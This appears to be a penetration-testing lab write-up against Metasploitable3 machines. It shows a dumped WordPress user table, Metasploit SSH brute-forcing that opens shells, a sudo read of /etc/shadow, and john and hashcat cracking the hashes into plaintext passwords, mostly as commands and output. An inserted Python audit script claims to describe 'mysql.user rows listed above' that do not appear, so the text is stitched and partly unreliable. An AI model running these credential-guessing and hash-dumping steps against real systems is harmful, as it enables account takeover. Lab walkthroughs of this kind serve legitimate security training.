| ID | user_login | user_pass                          | user_nicename | user_email          | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 | admin         | admin@example.com   |          | 2016-09-26 22:28:12 |                     |           0 | admin        |
|  2 | vagrant    | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ | vagrant       | vagrant@example.com |          | 2016-09-27 20:13:37 |                     |           0 | vagrant      |
|  3 | user       | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ | user          | user@example.com    |          | 2016-09-27 20:14:08 |                     |           0 | user         |
|  4 | manager    | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 | manager       | manager@example.com |          | 2016-09-27 20:15:14 |                     |           0 | manager      |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
4 rows in set (0.001 sec)

MySQL [wordpress]> exit
Bye
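The `mysql.user` rows listed above are the root cause of the passwordless root login. As an added example that is not part of the original write-up, the following script parses the box-drawn table the mysql client prints, flags the anonymous account, the passwordless root rows and the `'root'@'%'` wildcard grant, and emits the statements that would close them; the sample table is constructed here and trimmed to the relevant columns, and the function names are chosen for this example.

```python
"""Audit a mysql.user listing for the weaknesses behind the passwordless root login.

Parses the box-drawn output the mysql client prints for
`SELECT ... FROM mysql.user` and flags the grants that let an unauthenticated
remote client in as root, then prints the statements that would close them.
"""

# Constructed sample in the mysql client's table format, trimmed to the columns
# the audit needs; the values mirror the five rows shown on the page.
SAMPLE_USER_TABLE = """\
+-----------+------+----------+------------+------------+-----------+-----------------------+
| Host      | User | Password | Grant_priv | Super_priv | File_priv | authentication_string |
+-----------+------+----------+------------+------------+-----------+-----------------------+
| localhost | root |          | Y          | Y          | Y         |                       |
| 127.0.0.1 | root |          | Y          | Y          | Y         |                       |
| ::1       | root |          | Y          | Y          | Y         |                       |
| localhost |      |          | N          | N          | N         | NULL                  |
| %         | root |          | N          | Y          | Y         | NULL                  |
+-----------+------+----------+------------+------------+-----------+-----------------------+
"""

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_mysql_table(text):
    """Turn the mysql client's box-drawn table into a list of row dicts."""
    rows = [line for line in text.splitlines() if line.startswith("|")]
    if not rows:
        return []
    header = [cell.strip() for cell in rows[0].strip("|").split("|")]
    return [dict(zip(header, (cell.strip() for cell in row.strip("|").split("|"))))
            for row in rows[1:]]


def has_no_password(row):
    """True when neither the legacy Password column nor authentication_string holds a secret."""
    return row.get("Password", "") == "" and row.get("authentication_string", "") in ("", "NULL")


def audit_mysql_users(rows):
    """Return (findings, fixes): readable findings and the SQL that remediates them."""
    findings, fixes = [], []
    for row in rows:
        host, user = row["Host"], row["User"]
        acct = f"'{user}'@'{host}'"
        if user == "":
            findings.append(f"{acct}: anonymous account, any client name can log in")
            fixes.append(f"DROP USER {acct};")
            continue
        if host == "%" and has_no_password(row):
            # This is the row that let the mysql client above connect as root remotely.
            findings.append(f"{acct}: passwordless account reachable from any host")
            fixes.append(f"DROP USER {acct};")
            continue
        if has_no_password(row):
            findings.append(f"{acct}: no password set")
            fixes.append(f"SET PASSWORD FOR {acct} = PASSWORD('<new strong password>');")
        if host not in LOCAL_HOSTS:
            findings.append(f"{acct}: remote host pattern; restrict it to the application server")
        if row.get("File_priv") == "Y" and host not in LOCAL_HOSTS:
            findings.append(f"{acct}: FILE privilege on a remotely reachable account")
    return findings, fixes


if __name__ == "__main__":
    findings, fixes = audit_mysql_users(parse_mysql_table(SAMPLE_USER_TABLE))
    print("\n".join(findings))
    print("\n-- remediation --")
    print("\n".join(fixes))
```

The same parser works on any `SELECT` output pasted from the mysql client, so the audit can be re-run against the full 43-column listing without trimming it first.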

Focus on the last table listed, wp_users, which holds credentials.

Those credentials belong to a website running on the machine, specifically a WordPress site: the database is named "wordpress" and every table in it begins with the wp_ prefix, which stands for WordPress. On the assumption that the accounts in wp_users also exist on the operating system and that their owners reuse the same password for the local account and the website, try cracking the hashes with hashcat (a similar tool such as John the Ripper can also be used).

After a certain amount of time, cracking recovered only two of the hashed values taken from the database. However, Metasploit's ssh_login auxiliary module can try every combination from a list of usernames and a list of passwords once a couple of its module options are set. The lists therefore contain the two recovered passwords along with extra values for the combinations.

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE pass.txt
PASS_FILE => pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE usernames.txt
USER_FILE => usernames.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.105
RHOSTS => 192.168.56.105
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.56.105:22 - Starting bruteforce
[+] 192.168.56.105:22 - Success: 'vagrant:vagrant' 'Microsoft Windows Server 2008 R2 Standard 6.1.7601 Service Pack 1 Build 7601'
[+] 192.168.56.105:22 - Success: 'Administrator:vagrant' 'Microsoft Windows Server 2008 R2 Standard 6.1.7601 Service Pack 1 Build 7601'
[*] Command shell session 2 opened (10.0.3.15:44343 -> 192.168.56.105:22) at 2021-09-16 15:56:26 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type           Information                                           Connection
  --  ----  ----           -----------                                           ----------
  1         shell windows  SSH vagrant:vagrant (192.168.56.105:22)               10.0.3.15:38863 -> 192.168.56.105:22 (192.168.56.105)
  2         shell windows  SSH Administrator:vagrant (192.168.56.105:22)         10.0.3.15:44343 -> 192.168.56.105:22 (192.168.56.105)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

ls
AppData
Application Data
Contacts
Cookies
Desktop
Documents
Downloads
Favorites
Links
Local Settings
Music
My Documents
NTUSER.DAT
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
NetHood
Pictures
PrintHood
Recent
Saved Games
Searches
SendTo
Start Menu
Templates
Videos
config.yml
ntuser.dat.LOG1
ntuser.dat.LOG2
ntuser.ini

whoami
vagrant-2008r2\vagrant

systeminfo

Host Name:                 VAGRANT-2008R2
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          
Registered Organization:   Vagrant Inc.
Product ID:                00477-001-0000347-84598
Original Install Date:     8/30/2021, 8:30:25 AM
System Boot Time:          9/16/2021, 12:46:57 PM
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 60 Stepping 3 GenuineIntel ~3395 Mhz
BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 334 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 1,094 MB
Virtual Memory: In Use:    3,001 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3134760
                           [02]: KB976902
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.56.100
                                 IP address(es)
                                 [01]: 192.168.56.105
                                 [02]: fe80::f466:f625:3311:1aee
                           [02]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     255.255.255.255
                                 IP address(es)
                                 [01]: 169.254.253.55
                                 [02]: fe80::d883:3723:3d55:fd37

net users

User accounts for \\VAGRANT-2008R2

-------------------------------------------------------------------------------
Administrator            anakin_skywalker         artoo_detoo              
ben_kenobi               boba_fett                c_three_pio              
chewbacca                darth_vader              greedo                   
Guest                    han_solo                 jabba_hutt               
jarjar_binks             kylo_ren                 lando_calrissian         
leia_organa              luke_skywalker           sshd                     
sshd_server              vagrant                  
The command completed successfully.


net user sshd
User name                    sshd
Full Name                    sshd privsep
Comment                      
User's comment               
Country code                 000 (System Default)
Account active               No
Account expires              Never

Password last set            8/30/2021 8:37:02 AM
Password expires             Never
Password changeable          8/30/2021 8:37:02 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               C:\Program Files\OpenSSH\var\empty
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Users                
Global Group memberships     *None                 
The command completed successfully.

net user vagrant
User name                    vagrant
Full Name                    vagrant
Comment                      Vagrant User
User's comment               
Country code                 001 (United States)
Account active               Yes
Account expires              Never

Password last set            8/30/2021 8:30:14 AM
Password expires             Never
Password changeable          8/30/2021 8:30:14 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   9/16/2021 12:55:49 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users                
Global Group memberships     *None                 
The command completed successfully.

net user Administrator
User name                    Administrator
Full Name                    
Comment                      Built-in account for administering the computer/domain
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/30/2021 8:30:14 AM
Password expires             Never
Password changeable          8/30/2021 8:30:14 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   9/16/2021 12:57:07 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

exit

[*] 192.168.56.105 - Command shell session 1 closed.  Reason: User exit

Linux 14.04

Having found a variety of users during the gaining-access section, testing simple credentials with the ssh_login auxiliary module opens a command shell as a user who is a member of the sudo group. This lets us read the password hashes of every user, which can then be cracked to assure persistent access to the machine.

msf6 auxiliary(scanner/ssh/ssh_login) > options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD vagrant
PASSWORD => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME vagrant
USERNAME => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.56.106
RHOSTS => 192.168.56.106
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.56.106:22 - Starting bruteforce
[+] 192.168.56.106:22 - Success: 'vagrant:vagrant' 'uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo) Linux metasploitable3-ub1404 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 3 opened (192.168.56.104:37163 -> 192.168.56.106:22) at 2021-09-18 04:06:52 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                              Connection
  --  ----  ----         -----------                              ----------
  3         shell linux  SSH vagrant:vagrant (192.168.56.106:22)  192.168.56.104:37163 -> 192.168.56.106:22 (192.168.56.106)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 3
[*] Starting interaction with 3...

whoami
vagrant

id
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)

hostname
metasploitable3-ub1404

cat /etc/shadow
cat: /etc/shadow: Permission denied
 
sudo cat /etc/shadow 
root:!:18564:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:18564:0:99999:7:::
sshd:*:18564:0:99999:7:::
statd:*:18564:0:99999:7:::
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:18564:0:99999:7:::
dirmngr:*:18564:0:99999:7:::
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:18564:0:99999:7:::
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:18564:0:99999:7:::
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:18564:0:99999:7:::
artoo_detoo:$1$tfvzyRnv$mawnXAR4GgABt8rtn7Dfv.:18564:0:99999:7:::
c_three_pio:$1$lXx7tKuo$xuM4AxkByTUD78BaJdYdG.:18564:0:99999:7:::
ben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:18564:0:99999:7:::
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.:18564:0:99999:7:::
anakin_skywalker:$1$jlpeszLc$PW4IPiuLTwiSH5YaTlRaB0:18564:0:99999:7:::
jarjar_binks:$1$SNokFi0c$F.SvjZQjYRSuoBuobRWMh1:18564:0:99999:7:::
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0:18564:0:99999:7:::
boba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0:18564:0:99999:7:::
jabba_hutt:$1$9rpNcs3v$//v2ltj5MYhfUOHYVAzjD/:18564:0:99999:7:::
greedo:$1$vOU.f3Tj$tsgBZJbBS4JwtchsRUW0a1:18564:0:99999:7:::
chewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.:18564:0:99999:7:::
kylo_ren:$1$rpvxsssI$hOBC/qL92d0GgmD/uSELx.:18564:0:99999:7:::
mysql:!:18564:0:99999:7:::
avahi:*:18564:0:99999:7:::
colord:*:18564:0:99999:7:::
vboxadd:!:18880::::::

^C
Abort session 3? [y/N]  y

[*] 192.168.56.106 - Command shell session 3 closed.  Reason: User exit
msf6 auxiliary(scanner/ssh/ssh_login) >

A good idea now is to crack the passwords of all the users that are part of the sudo group. However, we already have the credentials for one of those accounts, so this is an extra measure to assure continued access to the machine, despite already having superuser access to it.

The first step is to take both the /etc/shadow and the /etc/passwd files and execute the following command.

unshadow passwd shadow > credentials

This merges the two files into a single file in the traditional Unix password-file format, with the hash in the second field, which is what john expects as input.

Note: unshadow is one of the utilities from John the Ripper.

Looking at the user names, the well-known credential wordlists are probably not the best fit for them. What about creating a list of words and sentences from Star Wars?

Now, use john or hashcat to crack the hashes with a wordlist. A first test, using john's single-crack mode, recovers the password we already obtained.

john --single credentials                                                                  
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt"
Use the "--format=md5crypt" option to force loading hashes of that type instead
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
vagrant          (vagrant)
1g 0:00:00:00 DONE (2021-10-08 04:18) 50.00g/s 200.0p/s 200.0c/s 200.0C/s vagrant..vagra
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Launch john or hashcat with the lists. Are any of the passwords cracked?

john credentials --wordlist=star_wars.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nerf_herder      (?)
help_me_obiwan   (?)
Warning: Only 42 candidates left, minimum 48 needed for performance.
2g 0:00:00:00 DONE (2021-10-08 07:13) 22.22g/s 6866p/s 93533c/s 93533C/s gRrrr0wr:..cHew!e;
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Two passwords cracked! The question now is which users they belong to. As the first list was built from lines the characters say in the movies, the best bet is to try these two passwords with Leia, the character who first said them!

Another option, though, is to check the john.pot file, where cracked passwords are stored.

$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwan

Comparing these hashes with the entries in the credentials file (the merged /etc/passwd and /etc/shadow) gives us the following:

<omitted>
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:1111:100::/home/leia_organa:/bin/bash
<omitted>
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:1113:100::/home/han_solo:/bin/bash
<omitted>

Therefrom, the credentials:

  1. leia_organa - help_me_obiwan

  2. han_solo - nerf_herder

Alternatively, use the following to simply look at the cracked passwords from the file.

john --show credentials
leia_organa:help_me_obiwan:1111:100::/home/leia_organa:/bin/bash
han_solo:nerf_herder:1113:100::/home/han_solo:/bin/bash

Using hashcat with the same list gives us another cracked password.

hashcat -m 500 credentials star_wars.txt                                                                                                                                                                                           
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 9 4900HS with Radeon Graphics, 2884/2948 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 15 digests; 15 unique digests, 15 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

INFO: Removed 2 hashes found in potfile.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: star_wars.txt
* Passwords.: 53
* Bytes.....: 712
* Keyspace..: 53
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:like_my_father_beforeme
                                                 
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: credentials
Time.Started.....: Fri Oct  8 08:01:34 2021 (0 secs)
Time.Estimated...: Fri Oct  8 08:01:34 2021 (0 secs)
Guess.Base.......: File (star_wars.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     6494 H/s (7.09ms) @ Accel:64 Loops:1000 Thr:1 Vec:8
Recovered........: 3/15 (20.00%) Digests, 3/15 (20.00%) Salts
Progress.........: 795/795 (100.00%)
Rejected.........: 0/795 (0.00%)
Restore.Point....: 53/53 (100.00%)
Restore.Sub.#1...: Salt:14 Amplifier:0-1 Iteration:0-1000
Candidates.#1....: help_me_obiwan -> chewie

Started: Fri Oct  8 08:01:33 2021
Stopped: Fri Oct  8 08:01:36 2021

Again, looking into the credentials file (the merged /etc/passwd and /etc/shadow), find the user name belonging to that hash.

<omitted>
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:1112:100::/home/luke_skywalker:/bin/bash
<omitted>

Therefrom, the credentials:

  1. luke_skywalker - like_my_father_beforeme

To continue, more lists should be derived from the first one. As an example, create another list with Mentalist as follows.

Launch hashcat or john with the new list!

Using hashcat gives us the following:

hashcat -m 500 credentials star_wars3.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 9 4900HS with Radeon Graphics, 2884/2948 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 15 digests; 15 unique digests, 15 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

INFO: Removed 3 hashes found in potfile.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: star_wars3.txt
* Passwords.: 216
* Bytes.....: 2949
* Keyspace..: 216
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00n 
                                                 
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: credentials
Time.Started.....: Fri Oct  8 08:35:16 2021 (0 secs)
Time.Estimated...: Fri Oct  8 08:35:16 2021 (0 secs)
Guess.Base.......: File (star_wars3.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     7929 H/s (6.60ms) @ Accel:256 Loops:250 Thr:1 Vec:8
Recovered........: 4/15 (26.67%) Digests, 4/15 (26.67%) Salts
Progress.........: 3240/3240 (100.00%)
Rejected.........: 0/3240 (0.00%)
Restore.Point....: 216/216 (100.00%)
Restore.Sub.#1...: Salt:14 Amplifier:0-1 Iteration:750-1000
Candidates.#1....: help_m3_obiwan -> ch3wie

Started: Fri Oct  8 08:35:15 2021
Stopped: Fri Oct  8 08:35:18 202

Once again, looking into the /etc/shadow file, find the user name belonging to that hash.

<omitted>
ben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:18564:0:99999:7:::
<omitted>

Therefrom, the credentials:

  1. ben_kenobi - thats_no_m00n

Running john with the same list gives the same result:

john --format=md5crypt root4john --wordlist=star_wars3.txt
Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Remaining 13 password hashes with 13 different salts
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thats_no_m00n    (ben_kenobi)
1g 0:00:00:00 DONE (2021-10-08 08:37) 50.00g/s 8750p/s 113750c/s 113750C/s help_m3_obiwan..ch3wie
Use the "--show" option to display all of the cracked passwords reliably
Session completed

In total, using three different populated lists, these are the credentials found:

  1. leia_organa - help_me_obiwan

  2. han_solo - nerf_herder

  3. luke_skywalker - like_my_father_beforeme

  4. ben_kenobi - thats_no_m00n

  5. vagrant - vagrant

As two programs were used to crack the passwords, look at both potfiles:

cat <path>/hashcat.potfile 
$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwan
$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:like_my_father_beforeme
$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00n

cat <path>/john.pot
$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:vagrant
$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwan
$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00n
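
As an added example, not part of the lab write-up nor john's or hashcat's own code, the following Python script does the hash-to-user matching above mechanically for both potfile formats, and additionally reports which accounts still use md5crypt ($1$) hashes, so a defender knows which accounts to rehash. The sample entries use the hashes from the lab output; the uid, gid and home fields for root, daemon and vagrant are filled in by hand.

```python
"""Join cracked potfile entries back to accounts and audit hash algorithms.

Added example, not part of the lab write-up and not john's or hashcat's own
code.  It does mechanically what the write-up does by hand: read the merged
passwd/shadow file written by `unshadow`, read the hash:password lines that
john.pot and hashcat.potfile hold, and join the two on the hash string.  It
also flags accounts whose hash uses md5crypt ($1$), the weaker algorithm the
Star Wars accounts use, so a defender knows which accounts to rehash.
"""

# crypt(5) prefix -> algorithm name.
ALGORITHMS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}

# Constructed sample in unshadow format.  The hashes are the ones shown in
# the lab output above; uid/gid/home fields for root, daemon and vagrant are
# filled in by hand.
SAMPLE_CREDENTIALS = """\
root:!:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:900:900::/home/vagrant:/bin/bash
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:1111:100::/home/leia_organa:/bin/bash
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:1112:100::/home/luke_skywalker:/bin/bash
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:1113:100::/home/han_solo:/bin/bash
"""

# The john.pot content shown above.  ben_kenobi's hash is deliberately absent
# from SAMPLE_CREDENTIALS so that unmatched potfile entries get reported.
SAMPLE_POTFILE = """\
$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:vagrant
$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:nerf_herder
$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:help_me_obiwan
$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:thats_no_m00n
"""


def parse_unshadow(text):
    """Parse user:hash:... lines into {user: hash}; comments and blanks skipped."""
    accounts = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            accounts[fields[0]] = fields[1]
    return accounts


def parse_potfile(text):
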